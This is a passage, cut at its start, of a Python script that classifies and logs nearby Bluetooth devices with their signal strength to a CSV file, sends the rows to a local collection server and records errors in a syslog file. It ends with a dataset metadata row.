                        audio_video_array = {'00': 'unasssigned', '04': 'Wearable Headset', '08': 'Hands-Free',
                                             '10': 'Microphone', '14': 'Loudspeaker', '18': 'Headphones',
                                             '1c': 'Portable ', '20': 'Car Audio', '24': 'Set-Top Box', '28': 'HiFi',
                                             '2c': 'Laptop', '30': 'Video Tape Recorder', '34': 'Video Camera',
                                             '38': 'Camcorder', '3c': 'Video Display and Loudspeaker',
                                             '40': 'Video Conferencing', '44': 'Reserved', '48': 'Game/Toy'}
                        classification = audio_video_array.get(concat, 'default')
                    elif device_class[5] == '5':
                        peripheral_array = {'00': 'unasssigned', '04': 'Joystick', '08': 'Gamepad',
                                            '0c': 'Remote control', '10': 'Sensing device', '14': 'Digitiser Tablet',
                                            '18': 'Card Reader'}
                        classification = peripheral_array.get(concat, 'default')
                    elif device_class[5] == '6':
                        imaging_array = {'00': 'unasssigned', '10': 'Display', '20': 'Camera', '40': 'Scanner',
                                         '80': 'Printer'}
                        classification = imaging_array.get(concat, 'default')
                    elif device_class[5] == '7':
                        wearable_array = {'00': 'unasssigned', '04': 'Wrist Watch', '08': 'Pager', '0c': 'Jacket',
                                          '10': 'Helmet', '14': 'Glasses'}
                        classification = wearable_array.get(concat, 'default')
                    elif device_class[5] == '8':
                        toys_array = {'00': 'unasssigned', '04': 'Robot', '08': 'Vehicle', '0c': 'Character',
                                      '10': 'Controller', '14': 'Game'}
                        classification = toys_array.get(concat, 'default')
                    device = (str(classification) + ' ' + str(
                        device_type)) # concatenate the final accurate classification
                    rssi = []
                    rssi += c.split()[8] # C array has rssi value in the 8th cell
                    concat_rssi = (str(rssi[0]) + str(rssi[1]) + str(
                        rssi[2])) # the three charecters constitute the rssi value
                    print(device_name + ',' + str(time.strftime('%d-%m-%Y %H:%M:%S')) + ',' + (
                        c.split()[0]) + ',' + device + ',' + concat_rssi)
                    data_string = device_name + ',' + str(time.strftime('%d-%m-%Y %H:%M:%S')) + ',' + (
                        c.split()[0]) + ',' + device + ',' + concat_rssi
                    scan_data_array.append(data_string)
                    # print(scan_data_array[scan_var])
                    scan_var = scan_var + 1 # Just a flag variable used to know whether ther was any scanned value
                    classification = ""
        # print(len(scan_data_array)) #Actual length of the array
        data_array = list(set(scan_data_array)) # we remove the duplicate data from the array
        scan_data_len = len(data_array)
        # print(scan_data_len) # reduced Lenth of the array
        if (scan_data_len):
            csv_file_obj = open(filename, 'a') # Create an object for open csv file
            print("opening csv file to write data")
            for i in range(scan_data_len):
                bt_var = 1
                csv_file_obj.write(data_array[i] + "\n") # writing the values to the CSV file one after the other,
                j = 1 # flag to know if any data is written to the file
            csv_file_obj.flush()
            csv_file_obj.close() # Closing the file
            if j:
                print('Data Written to the file')
                j = 0
        scan_data_array = []
        scan_var = 0
    except Exception as e: # Incase of any error , it is stored in the syslog file
        filename_log = 'Syslog.csv'
        field_log = ['Error', 'Date & Time']
        csv_syslog_obj = open(filename_log, 'a')
        print("opening csv file to write exception 1")
        log_writer = csv.DictWriter(csv_syslog_obj, fieldnames=field_log)
        log_writer.writerow(
            {'Error': str(e), 'Date & Time': str(time.strftime('%d-%m-%Y %H:%M:%S'))})
        csv_syslog_obj.close()
        print("Error: " + str(e))
    try:
        server_connectivity = 0 # A flag variable used to know whether the device has been connected to the server or not
        if (bt_var == 1): # As mentioned above the following block is executed only if any values were scanned and until the values are sent
            try: # Checking for internet connectivity
                host = socket.gethostbyname("www.google.com")
                s = socket.create_connection((host, 80), 2)
                s.close()
                print('internet on.')
                connectivity = 1
            # NOTE(review): bare except also swallows KeyboardInterrupt here --
            # consider `except OSError:` for the connectivity probe.
            except:
                print("internet off.")
                connectivity = 0
                os.system("sudo /etc/init.d/reconnectnet start")
            if (connectivity == 1): # only if internet connectivity exists the following connection establishment and data transmission block is executed
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creating a socket object
                print('Trying to connect.....')
                s.connect(("192.168.0.9", port)) # For RapsberryPi to connect to server
                # s.connect(("10.21.56.201", port)) # For Institute PC to connect to server
                server_connectivity = 1 # flag used to define if connectivity has been established
                print(s.recv(1024).decode()) # Connection establishment acknowledgement is printed from the server
                from itertools import islice # importing islice from itertools
                # First pass counts the CSV rows, second pass reads that many
                # raw lines for transmission.
                with open(filename, "r") as f:
                    send_data = csv.reader(f, delimiter=",")
                    list_data = list(send_data)
                    row_count = len(list_data)
                    print(row_count)
                with open(filename, "r") as myfile:
                    redc_data = list(islice(myfile, row_count)) # it takes the no. of rows and stores in the array
                    # myfile.close()
                # Lines are sent two at a time; an odd count sends one first.
                if (row_count % 2 == 0): # If the no. of data is even
                    for even in range(0, row_count - 1, 2):
                        data = redc_data[0 + even] + redc_data[1 + even]
                        s.send(data.encode())
                else: # if no. of data is odd
                    s.send(redc_data[0].encode()) # we first send one value seperately
                    for odd in range(1, row_count - 1, 2): # then we send two values together
                        data = redc_data[0 + odd] + redc_data[1 + odd]
                        s.send(data.encode())
                endofdata = "END\n" # End of data transmission variable
                s.send(endofdata.encode()) # eod variable is transmitted
                time.sleep(1)
                ack = s.recv(2048).decode() # Once all data is sent the an acknowledgement is received
                if ack: # Only if acknowledgement is received we remove the csv file and change the bt_var flag variable
                    # print(''.join(redc_data))
                    print('Data Sent Succssfully')
                    os.remove(filename)
                    bt_var = 0
                    data = ""
                s.close() # Close the socket
    except Exception as g: # any error in the block above is stored in syslog
        filename_log = 'Syslog.csv'
        field_log = ['Error', 'Date & Time']
        csv_syslog_obj = open(filename_log, 'a')
        print("opening csv file to write exception 2")
        log_writer = csv.DictWriter(csv_syslog_obj, fieldnames=field_log)
        log_writer.writerow(
            {'Error': str(g), 'Date & Time': str(time.strftime('%d-%m-%Y %H:%M:%S'))})
        csv_syslog_obj.close()
        print("Error: " + str(g))
    if (server_connectivity == 1): # only if connectivity was established we close the socket
        s.close() | UTF-8 | Python | false | false | 11,821 | py | 5 | bt_terminal_v1.py | 5 | 0.508586 | 0.489637 | 0 | 236 | 49.09322 | 251 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.